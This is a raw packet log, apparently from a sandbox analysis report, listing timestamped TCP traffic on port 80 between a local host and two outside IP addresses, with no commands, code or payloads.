                                                                Jul 5, 2024 04:23:17.055501938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.055516958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.055527925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.055540085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.055557966 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.055911064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.055978060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.055988073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.056008101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.056016922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.056029081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.056040049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.056098938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.056134939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.056160927 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057152987 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057163000 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057172060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057183027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057193995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057204008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057208061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057229042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057235956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057240009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057250023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057260036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057276964 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057285070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057288885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057300091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057307005 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057312012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057324886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057329893 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057336092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057349920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057356119 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057358980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057383060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057384014 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057391882 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057394981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057408094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057416916 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057424068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057441950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057445049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057456970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057488918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057490110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057501078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057533026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057553053 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057568073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057610035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057621002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057641983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057667017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057677031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057687998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057697058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057727098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057735920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057749987 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057760954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057770014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057781935 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057792902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057799101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057810068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057818890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057821989 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057833910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057837963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057858944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057869911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057879925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057883024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057902098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057903051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057913065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057915926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057928085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057944059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.057952881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057975054 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.057993889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058031082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058042049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058051109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058062077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058079004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058079004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058079004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058088064 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058093071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058104992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058104992 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058116913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058125019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058135986 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058136940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058145046 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058149099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058152914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058161020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058170080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058180094 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058182955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058199883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058209896 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058212042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058219910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058226109 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058231115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058239937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058254004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058267117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058275938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058285952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058296919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058307886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058320999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058330059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058331966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058357000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058362961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058368921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058381081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058389902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058398962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058410883 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058435917 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058442116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058456898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058469057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058473110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058480024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058491945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.058494091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058502913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058516026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.058537006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.141989946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.142000914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.142005920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.142071962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.142077923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.142090082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.142101049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.142112970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.142113924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.142124891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.142153978 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.142165899 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.143014908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143069029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143079996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143102884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143111944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143115044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.143122911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.143125057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143137932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143151999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.143191099 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.143218994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143229961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143239975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143253088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143265009 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.143270016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143273115 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.143280983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143290997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.143296957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.143317938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.143342018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.144835949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.144855022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.144869089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.144885063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.144896984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.144907951 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.144951105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.144984961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.145016909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.145035028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.145045996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.145059109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.145061016 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.145071983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.145083904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.145098925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.146261930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146282911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146292925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146302938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146375895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146385908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146397114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146406889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146441936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.146482944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.146823883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146876097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146883011 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.146887064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146915913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.146933079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.146965027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.146991014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.147001982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.147015095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.147025108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.147031069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.147053957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.148040056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.148088932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.148093939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.148128033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.148183107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.148222923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.148227930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.148235083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.148256063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.148271084 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.148535967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.148546934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.148588896 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.192946911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.197689056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.217601061 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:17.217981100 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:17.218434095 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:17.223347902 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:17.371857882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.371869087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.371879101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.371912956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.371921062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.371932030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.371942043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.371952057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.371978998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.371978998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.371987104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.371994972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372037888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372046947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372056961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372061968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372076035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372082949 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372090101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372100115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372107983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372112036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372126102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372138977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372145891 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372163057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372174025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372174025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372185946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372195959 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372205019 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372209072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372217894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372251987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372296095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372307062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372318029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372328997 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372333050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372340918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372351885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372364998 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372380018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372394085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372443914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372456074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372471094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372487068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372493982 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372498035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372513056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372514009 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372524977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372536898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372539043 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372565031 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372585058 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372596025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372606993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372617960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372627974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.372644901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.372667074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.375854969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.375874996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.375888109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.375926971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.375979900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376055956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376068115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376077890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376086950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376097918 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376106024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376116991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376128912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376136065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376140118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376147985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376157045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376178026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376183033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376190901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376200914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376200914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376211882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376224041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376225948 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376225948 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376255989 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376276970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376288891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376297951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376307964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376307964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376311064 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376322985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376323938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376337051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376357079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376380920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.376409054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.376419067 CEST804973285.28.47.30192.168.2.4
